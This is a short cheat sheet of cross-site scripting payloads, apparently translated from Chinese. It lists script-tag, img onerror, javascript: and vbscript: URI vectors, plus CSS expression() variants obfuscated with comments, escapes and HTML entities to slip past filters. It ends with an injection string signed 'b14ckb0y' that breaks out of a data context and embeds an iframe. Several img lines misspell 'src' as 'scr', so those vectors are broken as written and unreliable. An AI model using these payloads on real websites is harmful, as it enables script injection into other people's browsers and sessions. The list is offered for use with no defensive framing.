<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (the gap is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["